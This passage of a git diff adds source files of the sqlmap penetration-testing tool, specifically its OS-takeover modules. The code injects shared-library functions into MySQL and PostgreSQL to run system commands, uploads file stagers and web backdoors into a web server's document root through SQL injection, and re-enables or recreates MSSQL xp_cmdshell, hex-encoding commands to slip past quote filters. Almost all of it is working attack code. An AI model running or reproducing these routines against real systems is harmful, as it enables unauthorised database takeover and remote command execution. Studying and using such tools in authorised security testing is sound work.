+ def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): + if udfName is None: + udfName = "sys_eval" + + if conf.direct: + output = self.udfExecCmd(cmd, udfName=udfName) + + if output and isinstance(output, (list, tuple)): + new_output = "" + + for line in output: + new_output += line.replace("\r", "\n") + + output = new_output + else: + cmd = unescaper.escape(self.udfForgeCmd(cmd)) + + inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd)) + output = unArrayizeValue(inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)) + inject.goStacked("DELETE FROM %s" % self.cmdTblName) + + return output + + def udfCheckNeeded(self): + if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: + self.sysUdfs.pop("sys_fileread") + + if not conf.osPwn: + self.sysUdfs.pop("sys_bineval") + + if not conf.osCmd and not conf.osShell and not conf.regRead: + self.sysUdfs.pop("sys_eval") + + if not conf.osPwn and not conf.regAdd and not conf.regDel: + self.sysUdfs.pop("sys_exec") + + def udfSetRemotePath(self): + errMsg = "udfSetRemotePath() method must be defined within the plugin" + raise SqlmapUnsupportedFeatureException(errMsg) + + def udfSetLocalPaths(self): + errMsg = "udfSetLocalPaths() method must be defined within the plugin" + raise SqlmapUnsupportedFeatureException(errMsg) + + def udfCreateFromSharedLib(self, udf, inpRet): + errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" + raise SqlmapUnsupportedFeatureException(errMsg) + + def udfInjectCore(self, udfDict): + written = False + + for udf in udfDict.keys(): + if udf in self.createdUdf: + continue + + self.udfCheckAndOverwrite(udf) + + if len(self.udfToCreate) > 0: + self.udfSetRemotePath() + checkFile(self.udfLocalFile) + written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading the shared library, " + errMsg += "it looks like the binary file has not been written " + errMsg += "on the database underlying file system" + logger.error(errMsg) + + message = "do you want to proceed anyway? Beware that the " + message += "operating system takeover will fail [y/N] " + + if readInput(message, default='N', boolean=True): + written = True + else: + return False + else: + return True + + for udf, inpRet in udfDict.items(): + if udf in self.udfToCreate and udf not in self.createdUdf: + self.udfCreateFromSharedLib(udf, inpRet) + + if Backend.isDbms(DBMS.MYSQL): + supportTblType = "longtext" + elif Backend.isDbms(DBMS.PGSQL): + supportTblType = "text" + + self.udfCreateSupportTbl(supportTblType) + + return written + + def udfInjectSys(self): + self.udfSetLocalPaths() + self.udfCheckNeeded() + return self.udfInjectCore(self.sysUdfs) + + def udfInjectCustom(self): + if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL): + errMsg = "UDF injection feature only works on MySQL and PostgreSQL" + logger.error(errMsg) + return + + if not isStackingAvailable() and not conf.direct: + errMsg = "UDF injection feature requires stacked queries SQL injection" + logger.error(errMsg) + return + + self.checkDbmsOs() + + if not self.isDba(): + warnMsg = "functionality requested probably does not work because " + warnMsg += "the current session user is not a database administrator" + logger.warning(warnMsg) + + if not conf.shLib: + msg = "what is the local path of the shared library? " + + while True: + self.udfLocalFile = readInput(msg) + + if self.udfLocalFile: + break + else: + logger.warning("you need to specify the local path of the shared library") + else: + self.udfLocalFile = conf.shLib + + if not os.path.exists(self.udfLocalFile): + errMsg = "the specified shared library file does not exist" + raise SqlmapFilePathException(errMsg) + + if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): + errMsg = "shared library file must end with '.dll' or '.so'" + raise SqlmapMissingMandatoryOptionException(errMsg) + + elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): + errMsg = "you provided a shared object as shared library, but " + errMsg += "the database underlying operating system is Windows" + raise SqlmapMissingMandatoryOptionException(errMsg) + + elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): + errMsg = "you provided a dynamic-link library as shared library, " + errMsg += "but the database underlying operating system is Linux" + raise SqlmapMissingMandatoryOptionException(errMsg) + + self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] + self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] + + msg = "how many user-defined functions do you want to create " + msg += "from the shared library? " + + while True: + udfCount = readInput(msg, default='1') + + if udfCount.isdigit(): + udfCount = int(udfCount) + + if udfCount <= 0: + logger.info("nothing to inject then") + return + else: + break + else: + logger.warning("invalid value, only digits are allowed") + + for x in xrange(0, udfCount): + while True: + msg = "what is the name of the UDF number %d? " % (x + 1) + udfName = readInput(msg) + + if udfName: + self.udfs[udfName] = {} + break + else: + logger.warning("you need to specify the name of the UDF") + + if Backend.isDbms(DBMS.MYSQL): + defaultType = "string" + elif Backend.isDbms(DBMS.PGSQL): + defaultType = "text" + + self.udfs[udfName]["input"] = [] + + msg = "how many input parameters takes UDF " + msg += "'%s'? (default: 1) " % udfName + + while True: + parCount = readInput(msg, default='1') + + if parCount.isdigit() and int(parCount) >= 0: + parCount = int(parCount) + break + + else: + logger.warning("invalid value, only digits >= 0 are allowed") + + for y in xrange(0, parCount): + msg = "what is the data-type of input parameter " + msg += "number %d? (default: %s) " % ((y + 1), defaultType) + + while True: + parType = readInput(msg, default=defaultType).strip() + + if parType.isdigit(): + logger.warning("you need to specify the data-type of the parameter") + + else: + self.udfs[udfName]["input"].append(parType) + break + + msg = "what is the data-type of the return " + msg += "value? (default: %s) " % defaultType + + while True: + retType = readInput(msg, default=defaultType) + + if hasattr(retType, "isdigit") and retType.isdigit(): + logger.warning("you need to specify the data-type of the return value") + else: + self.udfs[udfName]["return"] = retType + break + + success = self.udfInjectCore(self.udfs) + + if success is False: + self.cleanup(udfDict=self.udfs) + return False + + msg = "do you want to call your injected user-defined " + msg += "functions now? [Y/n/q] " + choice = readInput(msg, default='Y').upper() + + if choice == 'N': + self.cleanup(udfDict=self.udfs) + return + elif choice == 'Q': + self.cleanup(udfDict=self.udfs) + raise SqlmapUserQuitException + + while True: + udfList = [] + msg = "which UDF do you want to call?" + + for udf in self.udfs.keys(): + udfList.append(udf) + msg += "\n[%d] %s" % (len(udfList), udf) + + msg += "\n[q] Quit" + + while True: + choice = readInput(msg).upper() + + if choice == 'Q': + break + elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList): + choice = int(choice) + break + else: + warnMsg = "invalid value, only digits >= 1 and " + warnMsg += "<= %d are allowed" % len(udfList) + logger.warning(warnMsg) + + if not isinstance(choice, int): + break + + cmd = "" + count = 1 + udfToCall = udfList[choice - 1] + + for inp in self.udfs[udfToCall]["input"]: + msg = "what is the value of the parameter number " + msg += "%d (data-type: %s)? " % (count, inp) + + while True: + parValue = readInput(msg) + + if parValue: + if "int" not in inp and "bool" not in inp: + parValue = "'%s'" % parValue + + cmd += "%s," % parValue + + break + else: + logger.warning("you need to specify the value of the parameter") + + count += 1 + + cmd = cmd[:-1] + msg = "do you want to retrieve the return value of the " + msg += "UDF? [Y/n] " + + if readInput(msg, default='Y', boolean=True): + output = self.udfEvalCmd(cmd, udfName=udfToCall) + + if output: + conf.dumper.string("return value", output) + else: + dataToStdout("No return value\n") + else: + self.udfExecCmd(cmd, udfName=udfToCall, silent=True) + + msg = "do you want to call this or another injected UDF? [Y/n] " + + if not readInput(msg, default='Y', boolean=True): + break + + self.cleanup(udfDict=self.udfs) diff --git a/src/sqlmap-master/lib/takeover/web.py b/src/sqlmap-master/lib/takeover/web.py new file mode 100644 index 0000000..3c7a819 --- /dev/null +++ b/src/sqlmap-master/lib/takeover/web.py @@ -0,0 +1,433 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import io +import os +import posixpath +import re +import tempfile + +from extra.cloak.cloak import decloak +from lib.core.agent import agent +from lib.core.common import arrayizeValue +from lib.core.common import Backend +from lib.core.common import extractRegexResult +from lib.core.common import getAutoDirectories +from lib.core.common import getManualDirectories +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSQLSnippet +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import isDigit +from lib.core.common import isTechniqueAvailable +from lib.core.common import isWindowsDriveLetterPath +from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import openFile +from lib.core.common import parseFilePaths +from lib.core.common import posixToNtSlashes +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import paths +from lib.core.datatype import OrderedSet +from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER +from lib.core.enums import OS +from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE +from lib.core.enums import WEB_PLATFORM +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT +from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import SHELL_RUNCMD_EXE_TAG +from lib.core.settings import SHELL_WRITABLE_DIR_TAG +from lib.core.settings import VIEWSTATE_REGEX +from lib.request.connect import Connect as Request +from thirdparty.six.moves import urllib as _urllib + +class Web(object): + """ + This class defines web-oriented OS takeover functionalities for + plugins. + """ + + def __init__(self): + self.webPlatform = None + self.webBaseUrl = None + self.webBackdoorUrl = None + self.webBackdoorFilePath = None + self.webStagerUrl = None + self.webStagerFilePath = None + self.webDirectory = None + + def webBackdoorRunCmd(self, cmd): + if self.webBackdoorUrl is None: + return + + output = None + + if not cmd: + cmd = conf.osCmd + + cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, getUnicode(cmd)) + page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) + + if page is not None: + output = re.search(r"<pre>(.+?)</pre>", page, re.I | re.S) + + if output: + output = output.group(1) + + return output + + def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None): + if filepath is not None: + if filepath.endswith('_'): + content = decloak(filepath) # cloaked file + else: + with openFile(filepath, "rb", encoding=None) as f: + content = f.read() + + if content is not None: + stream = io.BytesIO(getBytes(content)) # string content + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/3560 + # Reference: https://stackoverflow.com/a/4677542 + stream.seek(0, os.SEEK_END) + stream.len = stream.tell() + stream.seek(0, os.SEEK_SET) + + return self._webFileStreamUpload(stream, destFileName, directory) + + def _webFileStreamUpload(self, stream, destFileName, directory): + stream.seek(0) # Rewind + + try: + setattr(stream, "name", destFileName) + except TypeError: + pass + + if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True): + multipartParams = { + "upload": "1", + "file": stream, + "uploadDir": directory, + } + + if self.webPlatform == WEB_PLATFORM.ASPX: + multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION + multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE + + page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) + + if "File uploaded" not in (page or ""): + warnMsg = "unable to upload the file through the web file " + warnMsg += "stager to '%s'" % directory + logger.warning(warnMsg) + return False + else: + return True + else: + logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform) + return False + + def _webFileInject(self, fileContent, fileName, directory): + outFile = posixpath.join(ntToPosixSlashes(directory), fileName) + uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + query = "" + + if isTechniqueAvailable(getTechnique()): + where = getTechniqueData().where + + if where == PAYLOAD.WHERE.NEGATIVE: + randInt = randomInt() + query += "OR %d=%d " % (randInt, randInt) + + query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False)) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) + payload = agent.payload(newValue=query) + page = Request.queryPage(payload) + + return page + + def webInit(self): + """ + This method is used to write a web backdoor (agent) on a writable + remote directory within the web server document root. + """ + + if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: + return + + self.checkDbmsOs() + + default = None + choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) + + for ext in choices: + if conf.url.endswith(ext): + default = ext + break + + if not default: + default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP + + message = "which web application language does the web server " + message += "support?\n" + + for count in xrange(len(choices)): + ext = choices[count] + message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) + + if default == ext: + default = count + 1 + + message = message[:-1] + + while True: + choice = readInput(message, default=str(default)) + + if not isDigit(choice): + logger.warning("invalid value, only digits are allowed") + + elif int(choice) < 1 or int(choice) > len(choices): + logger.warning("invalid value, it must be between 1 and %d" % len(choices)) + + else: + self.webPlatform = choices[int(choice) - 1] + break + + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? [Y/n] " + + if readInput(message, default='Y', boolean=True): + headers = {} + been = set([conf.url]) + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + directories = list(arrayizeValue(getManualDirectories())) + directories.extend(getAutoDirectories()) + directories = list(OrderedSet(directories)) + + path = _urllib.parse.urlparse(conf.url).path or '/' + path = re.sub(r"/[^/]*\.\w+\Z", '/', path) + if path != '/': + _ = [] + for directory in directories: + _.append(directory) + if not directory.endswith(path): + _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) + directories = _ + + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) + backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform))) + + stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) + + for directory in directories: + if not directory: + continue + + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) + + uploaded = False + directory = ntToPosixSlashes(normalizePath(directory)) + + if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): + directory = "/%s" % directory + + if not directory.endswith('/'): + directory += '/' + + # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via LIMIT 'LINES TERMINATED BY' method" + logger.info(infoMsg) + self._webFileInject(stagerContent, stagerName, directory) + + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) + + uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) + uplPage = uplPage or "" + + if "sqlmap file uploader" in uplPage: + uploaded = True + break + + # Fall-back to UNION queries file upload method + if not uploaded: + warnMsg = "unable to upload the file stager " + warnMsg += "on '%s'" % directory + singleTimeWarnMessage(warnMsg) + + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via UNION method" + logger.info(infoMsg) + + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) + + handle, filename = tempfile.mkstemp() + os.close(handle) + + with openFile(filename, "w+b") as f: + _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) + _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + f.write(_) + + self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) + + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) + + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) + + uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) + uplPage = uplPage or "" + + if "sqlmap file uploader" in uplPage: + uploaded = True + break + + if not uploaded: + continue + + if "<%" in uplPage or "<?" in uplPage: + warnMsg = "file stager uploaded on '%s', " % directory + warnMsg += "but not dynamically interpreted" + logger.warning(warnMsg) + continue + + elif self.webPlatform == WEB_PLATFORM.ASPX: + kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) + kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) + + infoMsg = "the file stager has been successfully uploaded " + infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) + logger.info(infoMsg) + + if self.webPlatform == WEB_PLATFORM.ASP: + match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) + + if match: + backdoorDirectory = match.group(1) + else: + continue + + _ = "tmpe%s.exe" % randomStr(lowercase=True) + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): + self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) + self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) + self.webDirectory = backdoorDirectory + else: + continue + + else: + if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent): + warnMsg = "backdoor has not been successfully uploaded " + warnMsg += "through the file stager possibly because " + warnMsg += "the user running the web server process " + warnMsg += "has not write privileges over the folder " + warnMsg += "where the user running the DBMS process " + warnMsg += "was able to upload the file stager or " + warnMsg += "because the DBMS and web server sit on " + warnMsg += "different servers" + logger.warning(warnMsg) + + message = "do you want to try the same method used " + message += "for the file stager? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._webFileInject(backdoorContent, backdoorName, directory) + else: + continue + + self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName) + self.webDirectory = directory + + self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName) + + testStr = "command execution test" + output = self.webBackdoorRunCmd("echo %s" % testStr) + + if output == "0": + warnMsg = "the backdoor has been uploaded but required privileges " + warnMsg += "for running the system commands are missing" + raise SqlmapNoneDataException(warnMsg) + elif output and testStr in output: + infoMsg = "the backdoor has been successfully " + else: + infoMsg = "the backdoor has probably been successfully " + + infoMsg += "uploaded on '%s' - " % self.webDirectory + infoMsg += self.webBackdoorUrl + logger.info(infoMsg) + + break diff --git a/src/sqlmap-master/lib/takeover/xp_cmdshell.py b/src/sqlmap-master/lib/takeover/xp_cmdshell.py new file mode 100644 index 0000000..90cf3c9 --- /dev/null +++ b/src/sqlmap-master/lib/takeover/xp_cmdshell.py @@ -0,0 +1,302 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.common import flattenValue +from lib.core.common import getLimitRange +from lib.core.common import getSQLSnippet +from lib.core.common import hashDBWrite +from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isNumPosStrValue +from lib.core.common import isTechniqueAvailable +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS +from lib.core.enums import EXPECTED +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.threads import getCurrentThreadData +from lib.request import inject + +class XP_cmdshell(object): + """ + This class defines methods to deal with Microsoft SQL Server + xp_cmdshell extended procedure for plugins. + """ + + def __init__(self): + self.xpCmdshellStr = "master..xp_cmdshell" + + def _xpCmdshellCreate(self): + cmd = "" + + if not Backend.isVersionWithin(("2000",)): + logger.debug("activating sp_OACreate") + + cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + inject.goStacked(agent.runAsDBMSUser(cmd)) + + self._randStr = randomStr(lowercase=True) + self.xpCmdshellStr = "master..new_xp_cmdshell" + + cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) + + if not Backend.isVersionWithin(("2000",)): + cmd += ";RECONFIGURE WITH OVERRIDE" + + inject.goStacked(agent.runAsDBMSUser(cmd)) + + def _xpCmdshellConfigure2005(self, mode): + debugMsg = "configuring xp_cmdshell using sp_configure " + debugMsg += "stored procedure" + logger.debug(debugMsg) + + cmd = getSQLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode)) + + return cmd + + def _xpCmdshellConfigure2000(self, mode): + debugMsg = "configuring xp_cmdshell using sp_addextendedproc " + debugMsg += "stored procedure" + logger.debug(debugMsg) + + if mode == 1: + cmd = getSQLSnippet(DBMS.MSSQL, "enable_xp_cmdshell_2000", ENABLE=str(mode)) + else: + cmd = getSQLSnippet(DBMS.MSSQL, "disable_xp_cmdshell_2000", ENABLE=str(mode)) + + return cmd + + def _xpCmdshellConfigure(self, mode): + if Backend.isVersionWithin(("2000",)): + cmd = self._xpCmdshellConfigure2000(mode) + else: + cmd = self._xpCmdshellConfigure2005(mode) + + inject.goStacked(agent.runAsDBMSUser(cmd)) + + def _xpCmdshellCheck(self): + cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) + self.xpCmdshellExecCmd(cmd) + + return wasLastResponseDelayed() + + @stackedmethod + def _xpCmdshellTest(self): + threadData = getCurrentThreadData() + pushValue(threadData.disableStdOut) + threadData.disableStdOut = True + + logger.info("testing if xp_cmdshell extended procedure is usable") + output = self.xpCmdshellEvalCmd("echo 1") + + if output == "1": + logger.info("xp_cmdshell extended procedure is usable") + elif isNoneValue(output) and conf.dbmsCred: + errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath() + errMsg += "storing console output within the back-end file system " + errMsg += "does not have writing permissions for the DBMS process. " + errMsg += "You are advised to manually adjust it with option " + errMsg += "'--tmp-path' or you won't be able to retrieve " + errMsg += "the command(s) output" + logger.error(errMsg) + elif isNoneValue(output): + logger.error("unable to retrieve xp_cmdshell output") + else: + logger.info("xp_cmdshell extended procedure is usable") + + threadData.disableStdOut = popValue() + + def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): + echoedLines = [] + cmd = "" + charCounter = 0 + maxLen = 512 + + if isinstance(fileContent, (set, list, tuple)): + lines = fileContent + else: + lines = fileContent.split("\n") + + for line in lines: + echoedLine = "echo %s " % line + echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile) + echoedLines.append(echoedLine) + + for echoedLine in echoedLines: + cmd += "%s & " % echoedLine + charCounter += len(echoedLine) + + if charCounter >= maxLen: + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) + + cmd = "" + charCounter = 0 + + if cmd: + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) + + def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): + # When user provides DBMS credentials (with --dbms-cred) we need to + # redirect the command standard output to a temporary file in order + # to retrieve it afterwards + # NOTE: this does not need to be done when the command is 'del' to + # delete the temporary file + if conf.dbmsCred and insertIntoTable: + self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) + cmd = "%s > \"%s\"" % (cmd, self.tmpFile) + + # Obfuscate the command to execute, also useful to bypass filters + # on single-quotes + self._randStr = randomStr(lowercase=True) + self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr + + try: + self._forgedCmd += "SET @%s=%s;" % (self._randStr, "0x%s" % encodeHex(cmd, binary=False)) + except UnicodeError: + self._forgedCmd += "SET @%s='%s';" % (self._randStr, cmd) + + # Insert the command standard output into a support table, + # 'sqlmapoutput', except when DBMS credentials are provided because + # it does not work unfortunately, BULK INSERT needs to be used to + # retrieve the output when OPENROWSET is used hence the redirection + # to a temporary file from above + if insertIntoTable and not conf.dbmsCred: + self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable + + self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) + + return agent.runAsDBMSUser(self._forgedCmd) + + def xpCmdshellExecCmd(self, cmd, silent=False): + return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) + + def xpCmdshellEvalCmd(self, cmd, first=None, last=None): + output = None + + if conf.direct: + output = self.xpCmdshellExecCmd(cmd) + + if output and isinstance(output, (list, tuple)): + new_output = "" + + for line in output: + if line == "NULL": + new_output += "\n" + else: + new_output += "%s\n" % line.strip("\r") + + output = new_output + else: + inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) + + # When user provides DBMS credentials (with --dbms-cred), the + # command standard output is redirected to a temporary file + # The file needs to be copied to the support table, + # 'sqlmapoutput' + if conf.dbmsCred: + inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) + self.delRemoteFile(self.tmpFile) + + query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) + + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: + output = inject.getValue(query, resumeValue=False, blind=False, time=False) + + if (output is None) or len(output) == 0 or output[0] is None: + output = [] + count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if isNumPosStrValue(count): + for index in getLimitRange(count): + query = agent.limitQuery(index, query, self.tblField) + output.append(inject.getValue(query, union=False, error=False, resumeValue=False)) + + inject.goStacked("DELETE FROM %s" % self.cmdTblName) + + if output and isListLike(output) and len(output) > 1: + _ = "" + lines = [line for line in flattenValue(output) if line is not None] + + for i in xrange(len(lines)): + line = lines[i] or "" + if line is None or i in (0, len(lines) - 1) and not line.strip(): + continue + _ += "%s\n" % line + + output = _.rstrip('\n') + + return output + + def xpCmdshellInit(self): + if not kb.xpCmdshellAvailable: + infoMsg = "checking if xp_cmdshell extended procedure is " + infoMsg += "available, please wait.." + logger.info(infoMsg) + + result = self._xpCmdshellCheck() + + if result: + logger.info("xp_cmdshell extended procedure is available") + kb.xpCmdshellAvailable = True + + else: + message = "xp_cmdshell extended procedure does not seem to " + message += "be available. Do you want sqlmap to try to " + message += "re-enable it? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._xpCmdshellConfigure(1) + + if self._xpCmdshellCheck(): + logger.info("xp_cmdshell re-enabled successfully") + kb.xpCmdshellAvailable = True + + else: + logger.warning("xp_cmdshell re-enabling failed") + + logger.info("creating xp_cmdshell with sp_OACreate") + self._xpCmdshellConfigure(0) + self._xpCmdshellCreate() + + if self._xpCmdshellCheck(): + logger.info("xp_cmdshell created successfully") + kb.xpCmdshellAvailable = True + + else: + warnMsg = "xp_cmdshell creation failed, probably " + warnMsg += "because sp_OACreate is disabled" + logger.warning(warnMsg) + + hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable) + + if not kb.xpCmdshellAvailable: + errMsg = "unable to proceed without xp_cmdshell" + raise 